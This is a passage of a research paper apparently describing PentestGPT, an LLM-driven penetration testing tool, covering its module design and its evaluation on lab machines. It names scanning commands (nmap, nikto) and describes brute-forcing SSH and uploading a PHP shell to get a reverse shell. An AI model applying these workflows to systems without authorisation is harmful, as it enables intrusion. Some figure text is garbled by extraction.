2308.06782#25 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Finding 2: LLMs can efficiently use penetration test- ing tools, identify common vulnerabilities, and interpret source codes to identify vulnerabilities. # 4.4. Comparative Analysis (RQ2) To address RQ2, we examine the problem-solving strate- gies that LLMs employ, contrasting them with human pen- etration testers. In each penetration testing trial, we concen- trate on two main aspects: (1) Identifying the unnecessary operations that LLMs prompt, which are not conducive to successful penetration testing, as compared to a standard | 2308.06782#24 | 2308.06782#26 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#26 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 7 TABLE 3: Top Unnecessary Operations Prompted by LLMs on the Benchmark Targets Unnecessary Operations GPT-3.5 GPT-4 Bard Total Brute-Force CVE Study SQL Injection Command Injection 75 29 14 18 92 24 21 7 68 28 16 12 235 81 51 37 TABLE 4: Top causes for failed penetration testing trials Failure Reasons GPT3.5 GPT4 Bard Total Session context lost False Command Generation Deadlock operations False Scanning Output Interpretation False Source Code Interpretation Cannot craft valid exploit 25 23 19 13 16 11 18 12 10 9 11 15 31 20 16 18 10 8 74 55 45 40 37 34 walkthrough; and (2) Understanding the specific factors that prevent LLMs from successfully executing penetration tests. We analyze the unnecessary operations prompted by LLMs by breaking down the recorded testing procedures into sub-tasks. We employ the same method to formulate benchmark sub-tasks, as Section 3 outlines. By comparing this to a standard walkthrough, we identify the primary sub- task trials that fall outside the standard walkthrough and are thus irrelevant to the penetration testing process. The results are summarized in Table 3. We find that the most prevalent unnecessary operation prompted by LLMs is brute force. For all services requiring password authentication, LLMs typically advise brute-forcing it. This is an ineffective strat- egy in penetration testing. We surmise that many hacking incidents in enterprises involve password cracking and brute force. | 2308.06782#25 | 2308.06782#27 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#27 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | LLMs learn these reports from accident reports and are consequently considered viable solutions. Besides brute force, LLMs suggest that testers engage in CVE studies, SQL injections, and command injections. These recommen- dations are common, as real-world penetration testers often prioritize these techniques, even though they may not always provide the exact solution. We further investigate the reasons behind the failure of penetration testing trials. We manually categorize the causes of failure for the 195 penetration testing trials, with the results documented in Table 4. This table reveals that the predominant cause of failure is the loss of session context. The three examined models face difficulties in maintain- ing long-term conversational memory uniformly, frequently forgetting previous test results as the dialogue progresses. This lack of retention may be attributable to the limited token size within the LLM conversation context. | 2308.06782#26 | 2308.06782#28 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#28 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Given the intricate nature of penetration testingâ where a tester must skillfully link minor vulnerabilities across different services to develop a coherent exploitation strategyâ this loss of context substantially undermines the modelsâ effectiveness. Finding 3: LLMs struggle to maintain long-term mem- ory, which is vital to link vulnerabilities and develop exploitation strategies effectively. Secondly, LLMs strongly prefer the most recent tasks, adhering rigorously to a depth-first search approach. They concentrate on exploiting the immediate service, rarely devi- ating to a new target until all potential paths for the current one have been pursued. This can be attributed to the atten- tion of LLMs focusing more on the beginning and end of the prompt, as revealed in [34]. Experienced penetration testers generally assess the system from a broader standpoint, strategizing the subsequent steps likely to provide the most substantial results. When combined with the aforementioned memory loss issue, this tendency causes LLMs to become overly fixated on a specific service. As the test progresses, the models completely forget previous findings and reach a deadlock. Finding 4: LLMs strongly prefer recent tasks and a depth-first search approach, often resulting in an over- focus on one service and forgetting previous findings. Lastly, LLMs have inaccurate result generation and hallucination issues, as noted in [35]. This phenomenon ranks as the second most frequent cause of failures and is characterized by the generation of false commands. In our study, we observe that LLMs frequently identify the appropriate tool for the task but stumble in configuring the tools with the correct settings. In some cases, they even concoct non-existent testing tools or tool modules. | 2308.06782#27 | 2308.06782#29 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#29 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Finding 5: LLMs may generate inaccurate operations or commands, often stemming from inherent inaccuracies and hallucinations. Our exploratory study of three LLMs within penetra- tion testing reveals their potential for executing end-to-end tasks. Nevertheless, challenges arise in maintaining long- term memory, devising a testing strategy beyond a depth- first approach, and generating accurate operations. In the following section, we elucidate how we address these chal- lenges and outline our strategy for designing our LLM- powered penetration testing tool. | 2308.06782#28 | 2308.06782#30 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#30 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 5. Methodology # 5.1. Overview In light of the challenges identified in the preceding section, we present our proposed solution, PENTESTGPT, which leverages the synergistic interplay of three LLM- powered modules. As illustrated in Figure 3, PENTESTGPT incorporates three core modules: the Reasoning Module, the Generation Module, and the Parsing Module. Each module reserves one LLM session with its conversation and context. The user interacts seamlessly with PENTESTGPT, where distinct modules process different types of messages. | 2308.06782#29 | 2308.06782#31 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#31 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 8 This interaction culminates in a final decision, suggesting the subsequent step of the penetration testing process that the user should undertake. In the following sections, we eluci- date our design reasoning and provide a detailed breakdown of the engineering processes behind PENTESTGPT. # 5.2. Design Rationale Our central design considerations emerged from the three challenges observed in the previous Exploratory Study (Section 4): The first challenge (Finding 3) pertains to the issue of penetration testing context loss due to memory retention. LLMs in their original form struggle to maintain such long-term memory due to token size limits. The second obstacle (Finding 4) arises from the LLM chatbotsâ tendency to emphasize recent conversation content. In penetration testing tasks, this focuses on optimizing the immediate task. This approach falls short in the complex, interconnected task environment of penetration testing. The third obstacle (Finding 5) is tied to the inaccurate results generation by LLMs. When tasked to produce specific operations for a step in penetration testing directly, the outputs are often imprecise, sometimes even leading to PENTESTGPT has been engineered to address these challenges, rendering it more apt for penetration testing tasks. We drew inspiration from the methodologies em- ployed by real-world penetration testing teams, where a director plans overarching procedures, subdividing them into subtasks for individual testers. Each tester independently performs their task, reporting results without an exhaustive understanding of the broader context. The director then determines the following steps, possibly redefining tasks, and triggers the subsequent round of testing. Essentially, the director manages the overall strategy without becoming entrenched in the minutiae of the tests. This approach is mirrored in PENTESTGPTâ s functionality, enhancing its ef- ficiency and adaptability in conducting penetration tests. Our strategy divides penetration testing into two processes: iden- tifying the next task and generating the concrete operation to complete the task. Each process is powered by one LLM session. In this setup, the LLM session responsible for task identification retains the complete context of the ongoing penetration testing status. At the same time, the generation of detailed operations and parsing of information is managed by other sessions. This division of responsibilities fosters effective task execution while preserving the overarching context. To assist LLMs in effectively carrying out penetration testing tasks, we design a series of prompts that align with user inputs. | 2308.06782#30 | 2308.06782#32 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#32 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | We utilize the Chain-of-Thought (CoT) [36] methodology during this process. As CoT reveals, LLMsâ performance and reasoning capabilities can be significantly enhanced using the input, chain-of-thought, output prompt- ing format. Here, the chain-of-thought represents a series of intermediate natural language reasoning steps leading to the outcome. We dissect the penetration testing tasks into micro-steps and design prompts with examples to guide LLMs through processing penetration testing information Parsing Module Reasoning Module ' User Intention 7) FO Token Task Tree | â Subsequent | | Se Scocreseeeseee JET Ut Com Task Condenced Candidate @o â Operation | Information Tasks |. Generation _| i Testing Envrionmen| pasnpn esto can â â â â * : . . (Optional) User . Testing Targets }â Testing Tools * Verification â â â | 2308.06782#31 | 2308.06782#33 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#33 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Operations Completed by LLM 7 3User Controlled Message (CJ Information to User Hidden Information Figure 3: Overview of PENTESTGPT. step-by-step, ultimately leading to the desired outcomes. The complete prompts are available at our anonymized open- source project [18]. # 5.3. Reasoning Module The Reasoning Module plays a pivotal role in our system, analogous to a team lead overseeing the penetration testing task from a macro perspective. It obtains testing results or intentions from the user and prepares the testing strategy for the next step. This testing strategy is passed to the generation module for further planning. | 2308.06782#32 | 2308.06782#34 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#34 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Port Scanning SSH Service Hit FTP Service t | â Anonymous Login (Succ) Web Service , nr 7 Direct Injection Point Enumeration Identification Brute Force (Fail) Hidden Admin Page Login a) PTT Representatoin To effectively supervise the penetration testing process and provide precise guidance, it is crucial to translate the testing procedures and outcomes into a natural language format. Drawing inspiration from the concept of an attack tree [37], which is often used to outline penetration testing procedures, we introduce the notion of a pentesting task tree (PTT). This novel approach to testing status representation is rooted in the concept of an attributed tree [38]: Definition 1 (Attributed Tree). A attributed tree is an edge- labeled, attributed polytree G = (V, E, λ, µ) where V is a set of nodes (or vertices), E is a set of directed edges, λ : | 2308.06782#33 | 2308.06782#35 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#35 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | E â Σ is an edge labeling function assigning a label from the alphabet Σ to each edge and µ : (V â ª E) à K â S is a function assigning key(from K)-value(from S) pairs of properties to the edges and nodes. [Task Tree: 1. Perform port scanning (completed) - Port 21, 22 and 80 are open. - Services are FTP, SSH, and Web Service. 2. Perform the testing 2.1 Test FIP Service 2.1.1 Test Anonymous Login (success) 2.1.1.1 Test Anonymous Upload (success) 2 Test SSH Service 2.2.1 Brute-force (failed) 2.3 Test Web Service (ongoing) 2.3.1 Directory Enumeration 2.3.1.1 Find hidden admin (to-do) 2.3.2 Injection Identification (todo) | 2308.06782#34 | 2308.06782#36 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#36 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | b) PTT Representation in Natural Language Figure 4: Pentesting Task Tree in a) visualized tree format, and b) natural language format encoded in LLM. Given the definition of attributed tree, PTT is defined as follows: Definition 2 (Pentesting Task Tree). An PTT T is a pair (N, A), where: (1) N is a set of nodes organized in a tree structure. Each node has a unique identifier, and there is a special node called the root that has no parent. Each node, other than the root, has exactly one parent and zero or more children. (2) A is a function that assigns to each node n â N a set of attributes A(n). Each attribute is a pair (a, v), where a is the attribute name and v is the attribute value. The set of attributes can be different for each node. | 2308.06782#35 | 2308.06782#37 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#37 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | As outlined in Figure 3, the Reasoning Moduleâ s opera- tion unfolds over four key steps operating over the PTT. â ¶ Initially, the module absorbs the userâ s intentions to construct an initial PTT in the form of natural language. This is achieved by carefully instructing the LLM with examples and definitions of PPT using meticulously crafted prompts. The LLM outputs are parsed to confirm that the tree structure is accurately formatted. Note that due to the nature of the tree structure, it can be represented in the natural language format through layered bullets, as illustrated in Figure 4. The Reasoning Module effectively | 2308.06782#36 | 2308.06782#38 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#38 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 9 overcomes the memory-loss issue by maintaining a task tree that encompasses the entire penetration testing process. â · After updating the tree information, a verification step is conducted on the newly updated PTT to ascertain its correctness. This process checks explicitly that only the leaf nodes of the PTT have been modified, aligning with the principle that atomic operations in the penetration testing process should only influence the status of the lowest-level sub-tasks. This step confirms the correctness of the reason- ing process, safeguarding against any potential alterations to the overall tree structure due to hallucination by the LLM. If discrepancies arise, the information is reverted to the LLM for correction and regeneration. â ¸ With the updated PTT, the Reasoning Module evaluates the current tree state and pinpoints viable sub-tasks that can serve as candidate steps for further testing. â ¹ Finally, the module evaluates the likelihood of these sub-tasks leading to suc- cessful penetration testing outcomes. It then recommends the top task as the output. The expected results of this task are subsequently forwarded to the Generation Module for an in-depth analysis. This is feasible, as demonstrated in the exploratory study, since LLMs, particularly GPT-4, can identify potential vulnerabilities when provided with system status information. This procedural approach enables the Reasoning Module to address one of the inherent lim- itations of LLMs, precisely their tendency to concentrate solely on the most recent task. Note that in cases where the tester identifies that the correct task is incorrect or not completed in a preferred way, he could also manually revise the PTT through the interactive handle further discussed in Section 5.6. We devise four sets of prompts to sequentially guide the Reasoning Module through the completion of each stage. To bolster the reproducibility of our results, we optimize these prompts further with a technique known as hint gen- eration [39]. From our practical experience, we observe that LLMs are adept at interpreting the tree-structured infor- mation pertinent to penetration testing and can update it accurately in response to test outputs. # 5.4. Generation Module The Generation Module translates specific sub-tasks from the Reasoning Module into concrete commands or instructions. Each time a new sub-task is received, a fresh session is initiated in the Generation Module. This strategy effectively isolates the context of the overarching penetration task from the immediate task under execution, enabling the LLM to focus entirely on generating specific commands. | 2308.06782#37 | 2308.06782#39 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#39 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Instead of directly transforming the received sub-task into specific operations, our design employs the CoT strat- egy [36] to partition this process into two sequential steps. This design decision directly addresses the challenges as- sociated with model inaccuracy and hallucination by en- hancing the modelâ s reasoning capability. In particular, â º upon the receipt of a concise sub-task from the Reason- ing Module, the Generation Module begins by expanding it into a sequence of detailed steps. Notably, the prompt | 2308.06782#38 | 2308.06782#40 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#40 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 10 associated with this sub-task requires the LLM to consider the possible tools and operations available within the testing environment. â » Subsequently, the Generation Module trans- forms each of these expanded steps into precise terminal commands ready for execution or into detailed descriptions of specific Graphical User Interface (GUI) operations to be carried out. This stage-by-stage translation eliminates poten- tial ambiguities, enabling testers to follow the instructions directly and seamlessly. Implementing this two-step process effectively precludes the LLM from generating operations that may not be feasible in real-world scenarios, thereby improving the success rate of the penetration testing proce- dure. By acting as a bridge between the strategic insights provided by the Reasoning Module and the actionable steps required for conducting a penetration test, the Generation Module ensures that high-level plans are converted into precise and actionable steps. This transformation process significantly bolsters the overall efficiency of the penetration testing procedure. | 2308.06782#39 | 2308.06782#41 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#41 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | An Illustrative Example. We utilize a real-world running example to illuminate how the Reasoning Module and the Generation Module collaboratively operate to complete pen- etration testing tasks. Figure 5 illustrates a single iteration of PENTESTGPT working on the HackTheBox machine Car- rier [40], a medium-difficulty target. As depicted in a-1), the PTT, in natural language format, encodes the testing status, revealing the open ports (21, 22,80) on the target machine. The Reasoning Module is subsequently instructed to identify the available tasks. As highlighted in red, service scanning is the only available task on the leaf node of the PTT. This task is therefore chosen and forwarded to the Generation Module for command generation. The generated command is executed in the testing environment, and the execution result is conveyed to the Reasoning Module to update the PTT. In a-2), the Reasoning Module integrates the previous scanning result into the PTT, cross-referencing it with the earlier PTT to update only the leaf nodes. It then looks for the available tasks to execute. In this case, two tasks emerge: scanning the web service on port 80 and checking the SSH service for known vulnerabilities. The LLM evaluates which task is more promising and chooses to investigate the web service, often seen as more vulnerable. This task is passed to the Generation Module. The Generation Module turns this general task into a detailed process, employing nikto [41], a commonly used web scanning script. The iterative process continues until the tester completes the penetration testing task. # 5.5. Parsing Module The Parsing Module operates as a supportive interface, enabling effective processing of the natural language infor- mation exchanged between the user and the other two core modules. Two needs can primarily justify the existence of this module. First, security testing tool outputs are typically verbose, laden with extraneous details, making it compu- tationally expensive and unnecessarily redundant to feed Reasoning Module Task Tree: 1. Perform reconnaissance tasks b-1) Available Leaf-node Tasks â Available Tasks 1. Identify services running on (on-going) 1.1. Scan for open ports on the target machine (completed) = Port 21, 22 and 80 are open. I arte Decided Task Identify services running on open ports. = Port 21, 22 and 80 are open. 1.2. | 2308.06782#40 | 2308.06782#42 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#42 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Identify services running on open ports. 2. Perform the testing Cross a-1) Task Tree c-1) Decided Task Generation Module d-1) Command to Execute [Command to Execute Use nmap to determine service versions on open ports. The Execution Outputs e-1) Execution Result map OuEpae r|command is â nmap -sV ~p21,22,80 PORy STATE SERVICE VERSION ' <ip-address>*. 21/tcp filtered ftp 1 22/tcp open ssh OpenSSH 7.6p1 a 1 80/tcp open http Apache 2.4.18 | Service Info: OS: Linux; CPE: Testing Environment with the Target Machine| | \Check t Task Tree: 1. Perform reconnaissance tasks b-2) Available Leaf-node Tasks Available Tasks 1.2... 1. Scan the web port 1.2. Identify services running on open ports. contain known vulnerabilities. We Check if the SSH service = FIP filtered, OpenSSH 7.6p1, Apache 2.4.18 ore â | 2308.06782#41 | 2308.06782#43 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#43 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | ! ee 2. Perform the testing 2.1 Scan the web port 2.2 Check if the SSH service contain known vulnerabilities. a-2) Updated Task Tree c-2) Decided Task (Command to Execute Use nikto to scan the target lweb service. The command is â nikto -h <ip-address>*. e-2) Execution Result aKtS Output + Server: Apache/2.4.18 (Ubuntu) L,|+ the anti-clickjacking x-Frame- loptions header is not present. d-2) Command to Execute Generation Figure 5: A demonstration of the task-tree update process on the testing target HTB-Carrier these extended outputs directly into the LLMs. Second, users without specialized knowledge in the security domain may struggle to extract key insights from security testing out- puts, presenting challenges in summarizing crucial testing information. Consequently, the Parsing Module is essential in streamlining and condensing this information. and users can always query the reasoning context without making unnecessary changes. If the user believes it nec- essary to update the PTT, they can explicitly instruct the model to update the reasoning context history accordingly. This provides a robust and flexible framework for the user to participate in the decision-making process actively. the Parsing Module is devised to handle four distinct types of information: (1) user intentions, which are directives provided by the user to dictate the next course of action, (2) security testing tool outputs, which represent the raw outputs generated by an array of security testing tools, (3) raw HTTP web information, which encompasses all raw information derived from HTTP web interfaces, and (4) source codes extracted during the penetration testing process. Users must specify the category of the information they provide, and each category is paired with a set of carefully designed prompts. For source code analysis, we integrate the GPT-4 code interpreter [42] to execute the task. | 2308.06782#42 | 2308.06782#44 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#44 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 5.6. Active Feedback While LLMs can produce insightful outputs, their out- comes may sometimes require revisions. To facilitate this, we introduce an interactive handle in PENTESTGPT, known as active feedback, which allows the user to interact directly with the Reasoning Module. A vital feature of this process is that it does not alter the context within the Reasoning Module unless the user explicitly desires to update some information. The reasoning context, including the PTT, is stored as a fixed chunk of tokens. This chunk of tokens is provided to a new LLM session during an active feedback interaction, and users can pose questions regarding them. This ensures that the original session remains unaffected, # 5.7. Discussion We explore various design alternatives for PENTEST- GPT to tackle the challenges identified in Exploratory Study. We have experimented with different designs, and here we discuss some key decisions. Addressing Context Loss with Token Size: a straight- forward solution to alleviate context loss is the employment of LLM models with an extended token size. For instance, GPT-4 provides versions with 8k and 32k token size limits. | 2308.06782#43 | 2308.06782#45 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#45 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | This approach, however, confronts two substantial chal- lenges. First, even a 32k token size might be inadequate for penetration testing scenarios, as the output of a single testing tool like dirbuster [43] may comprise thousands of tokens. Consequently, GPT-4 with a 32k limit cannot retain the entire testing context. Second, even when the entire conversation history fits within the 32k token boundary, the API may still skew towards recent content, focusing on local tasks and overlooking broader context. These issues guided us in formulating the design for the Reasoning Module and the Parsing Module. Vector Database to Improve Context Length: Another technique to enhance the context length of LLMs involves a vector database [44], [45]. By transmuting data into vec- tor embeddings, LLMs can efficiently store and retrieve information, practically creating long-term memory. | 2308.06782#44 | 2308.06782#46 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#46 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Theo- retically, penetration testing tool outputs could be archived 11 in the vector database. In practice, though, we observe that many results closely resemble and vary in only nuanced ways. This similarity often leads to confused information retrieval. Solely relying on a vector database fails to over- come context loss in penetration testing tasks. Integrating the vector database into the design of PENTESTGPT is an avenue for future research. Precision in Information Extraction: Precise informa- tion extraction is crucial for conserving token usage and avoiding verbosity in LLMs. Rule-based methods are com- monly employed to extract diverse information. However, rule-based techniques are engineeringly expensive given natural languageâ s inherent complexity and the variety of information types in penetration testing. We devise the Parsing Module to manage several general input information types, a strategy found to be both feasible and efficient. of LLMs: LLMs an all- encompassing solution. Present LLMs exhibit flaws, includ- ing hallucination [46] and outdated knowledge. Our miti- gation efforts, such as implementing task tree verification to ward off hallucination, might not completely prevent the Reasoning Module from producing erroneous outcomes. Thus, a human-in-the-loop strategy becomes vital, facilitat- ing the input of necessary expertise and guidance to steer LLMs effectively. | 2308.06782#45 | 2308.06782#47 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#47 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 6. Evaluation In this section, we assess the performance of PENTEST- GPT, focusing on the following four research questions: RQ3 (Performance): How does the performance of PEN- TESTGPT compare with that of native LLM models and human experts? RQ4 (Strategy): Does PENTESTGPT employ different problem-solving strategies compared to those utilized by LLMs or human experts? RQ5 (Ablation): How does each module within PENTEST- GPT contribute to the overall penetration testing perfor- mance? RQ6 (Practicality): Is PENTESTGPT practical and effective in real-world penetration testing tasks? # 6.1. Evaluation Settings We implement PENTESTGPT with 1,700 lines of Python3 code and 740 prompts, available at our anonymized project website [18]. We evaluate its performance over the benchmark constructed in Section 3. In this evaluation, we integrate PENTESTGPT with GPT-3.5 and GPT-4 to form two working versions: PENTESTGPT-GPT-3.5 and PENTESTGPT-GPT-4. | 2308.06782#46 | 2308.06782#48 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#48 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Due to the lack of API access, we do not select other LLM models, such as Bard. In line with our previous experiments, we use the same experiment environment setting and instruct PENTESTGPT to only use the non-automated penetration testing tools. 12 # 6.2. Performance Evaluation (RQ3) The overall task completion status of PENTESTGPT- GPT-3.5, PENTESTGPT-GPT-4, and the naive usage of LLMs is illustrated in Figure 6a. As the Figure shows, our solutions powered by LLMs demonstrate superior penetra- tion testing capabilities compared to the naive application of LLMs. Specifically, PENTESTGPT-GPT-4 surpasses the other three solutions, successfully solving 6 out of 7 easy difficulty targets and 2 out of 4 medium difficulty targets. This performance indicates that PENTESTGPT-GPT-4 can handle penetration testing targets ranging from easy to medium difficulty levels. Meanwhile, PENTESTGPT-GPT- 3.5 manages to solve only two challenges of easy difficulty, a discrepancy that can be attributed to GPT-3.5 lacking the knowledge related to penetration testing found in GPT-4. The sub-task completion status of PENTESTGPT-GPT- 3.5, PENTESTGPT-GPT-4, and the naive usage of LLM is shown in Figure 6b. As the Figure illustrates, both PENTESTGPT-GPT-3.5 and PENTESTGPT-GPT-4 per- form better than the standard utilization of LLMs. It is noteworthy that PENTESTGPT-GPT-4 not only solves one more medium difficulty target compared to naive GPT-4 but also accomplishes 111% more sub-tasks (57 vs. 27). This highlights that our design effectively addresses context loss challenges and leads to more promising testing results. Nevertheless, all the solutions struggle with hard difficulty testing targets. As elaborated in Section 4, hard difficulty targets typically demand a deep understanding from the penetration tester. To reach testing objectives, they may require modifications to existing penetration testing tools or scripts. | 2308.06782#47 | 2308.06782#49 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#49 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Our design does not expand the LLMsâ knowledge of vulnerabilities, so it does not notably enhance perfor- mance on these more complex targets. # 6.3. Strategy Evaluation (RQ4) We then investigate the problem-solving strategies em- ployed by PENTESTGPT, contrasting them with those of LLMs and human experts. By manually analyzing the pen- etration testing process of PENTESTGPT, we synthesize its underlying approaches to problem-solving. We surprisingly find that PENTESTGPT decomposes the penetration test- ing task in a manner akin to human experts, successfully achieving the overall goal. Instead of focusing solely on the most recently discovered task, PENTESTGPT can pinpoint potential sub-tasks likely to lead to successful outcomes. Figure 7 provides an illustrative example, demonstrating the strategic differences between GPT-4 and PENTESTGPT while handling the VulnHub machine, Hackable II [47]. This target comprises two vulnerable services: an FTP service allowing arbitrary file uploads and a web service enabling file viewing through FTP. A successful exploit necessitates exploiting both services by uploading a malicious PHP through the shell via the FTP service and triggering it web service. As depicted in the figure, GPT-4 begins by enumerating the FTP service and successfully identifies the file upload vulnerability (â | 2308.06782#48 | 2308.06782#50 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#50 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | ¶-â ¸). However, it fails to correlate â GPT3.5 â â PentestGPT-GPT-3.5 6 â GPT4 â PentestGPT-GPT-4 4 2 2 1 1 0 |_| oO oo o o Easy Medium Hard (a) Overall completion status. â GPT3.5 â GPr4 ~~ PentestGPT-GPT-3.5 69 â â PentestGPT-GPT-4 57 Easy Medium Hard | 2308.06782#49 | 2308.06782#51 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#51 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | (b) Subtask completion status. Figure 6: The PENTESTGPT-GPT-3.5, on overall target completion and sub-task completion. this with the web service, resulting in an incomplete exploit in the following steps. Conversely, PENTESTGPT follows a more holistic approach, toggling between enumerating the FTP service and browsing the web service. In particular, PENTESTGPT firstly â ¶ enumerates the FTP service and â · web service to understand the general situation. It then â ¸ prioritizes the FTP service, and â ¹ eventually discovers the file upload vulnerability. More importantly, in this process, PENTESTGPT identifies that files available on FTP are the same as those on the web service. By connecting these findings, PENTESTGPT guides the tester to â º perform a shell upload, â » leading to a successful reverse shell. This strategy aligns with the walkthrough solution and highlights PENTESTGPTâ s comprehensive understanding of the pene- tration testing process and its ability to make effective de- cisions on the optimal sub-task to pursue next. This reveals PENTESTGPTâ s strategic thinking and ability to integrate different aspects of the testing process. Our second observation is that although PENTESTGPT behaves more similarly to human experts, it still exhibits some strategies that humans will not apply. For instance, PENTESTGPT still prioritizes brute-force attacks before vul- nerability scanning. This is obvious in cases where PEN- TESTGPT always tries to brute-force the SSH service on target machines. We then analyze the failed penetration testing cases to understand the limitations of PENTESTGPT. Beyond the absence of some advanced penetration testing techniques, two primary issues emerge. First, PENTESTGPT struggles | 2308.06782#50 | 2308.06782#52 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#52 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 13 GPT-4 Port Scanning FIP) | Service PentestGPT t ! 1 ' ] q 1 1 I q 1 1 I q 1 1 fl i if file); '( Web 1 File | Browsing q 1{ Scanning i Browsing 1 3 1 1 q i} 1 fi q 1 I q 1 fi q t 1 I q 1) Flow2 | 1 q 1 Flow 1 & 2 are Independent Flow 1 & 2 are Interrelated # f) f) Figure 7: | 2308.06782#51 | 2308.06782#53 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#53 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing strategy comparison between GPT-3.5 and PENTESTGPT on VulnHub-Hackable II. to interpret images. LLMs are limited to text comprehension, so they cannot accurately process images. This issue might be addressed by developing large multimodal models to un- derstand text and visual data. Second, it cannot grasp certain social engineering tricks and subtle cues. For instance, real- world penetration testers often create brute-force wordlists using information gathered from the target service. Though PENTESTGPT can retrieve a list of names from a web service, it fails to instruct the use of tools to create a wordlist from those names. | 2308.06782#52 | 2308.06782#54 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#54 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | These limitations underline the necessity for improvement in areas where human insight and intricate reasoning are still more proficient than automated solutions. # 6.4. Ablation Study (RQ5) We perform an ablation study on how the three mod- ules: Reasoning Module, Generation Module, and Parsing Module, contribute to the performance of PENTESTGPT. We implement three variants: the Parsing Module is deactivated, causing all data to be directly fed into the system. the Generation Module is deactivated, leading to the completion of task generation within the Reasoning Module itself. The prompts for task generation remain consistent. 3) PENTESTGPT-NO-REASONING: the Reasoning Mod- ule is desabled. Instead of PTT, this variant adopts the same methodology utilized with LLMs for penetration testing, as delineated in the Exploratory Study. All the variants are integrated with GPT-4 API for testing. The results of the three variants tested on our pen- etration testing benchmarks are depicted in Figure 8. In general, PENTESTGPT demonstrates superiority over the three ablation baselines regarding overall target and sub-task completion. Our key findings are as follows: (1) In the ab- sence of the Parsing Module, PENTESTGPT-NO-PARSING attains marginally lower performance in overall task and sub-task completion relative to the full configuration. While parsing information is advantageous in penetration testing, | 2308.06782#53 | 2308.06782#55 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#55 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | â â â PentestGPT-no-Generation â â PentestGPT â PentestGPT-no-Parsing â â PentestGPT-no-Reasoning 2 1 1 BB. o o o oOo Medium Hard Easy (a) Overall completion status ~â â PentestGPT-no-Generation â â PentestGPT â PentestGPT-no-Parsing â PentestGPT-no-Reasoning 69 Easy Medium | 2308.06782#54 | 2308.06782#56 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#56 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | (b) Sub-task completion status Figure 8: The performance of PENTESTGPT, PEN- TESTGPT-NO-ANNOTATION, PENTESTGPT-OPERATION- ONLY, and PENTESTGPT-PARAMETER-ONLY on both nor- malized average code coverage (µLOC) and bug detection. the 32k token size limit often suffices for various outputs. Given the Reasoning Moduleâ s inherent design to maintain the entire testing context, the lack of the Parsing Module does not substantially impair the toolâ s performance. (2) PENTESTGPT-NO-REASONING fares the worst, completing only 53.6% of the sub-tasks achieved by the full solution, an outcome even inferior to the naive application of GPT- 4 in testing. We attribute this to the Generation Module adding supplementary sub-tasks to the LLM context. Since the prompts are not tailored for scenarios without the Rea- soning Module, the resulting outputs are irrelevant for the naive LLM without the Generation Module. Furthermore, the extended generation output obscures the original context, hindering the LLMâ s ability to concentrate on the task, thus failing the test. (3) PENTESTGPT-NO-GENERATION realizes performance slightly above that of GPT-4 em- ployed naively. This occurs because, without the Generation Module, the testing procedure closely resembles the usage of LLMs. Notably, the Generation Module is principally intended to guide the tester in executing precise penetration the tester may testing operations. Without depend on supplementary information to operate the tools or scripts essential for completing the test. # 6.5. Practicality Study (RQ6) We demonstrate that PENTESTGPT exhibits practicality for real-world penetration testing beyond the crafted bench- mark. For this purpose, we engage PENTESTGPT in the | 2308.06782#55 | 2308.06782#57 | 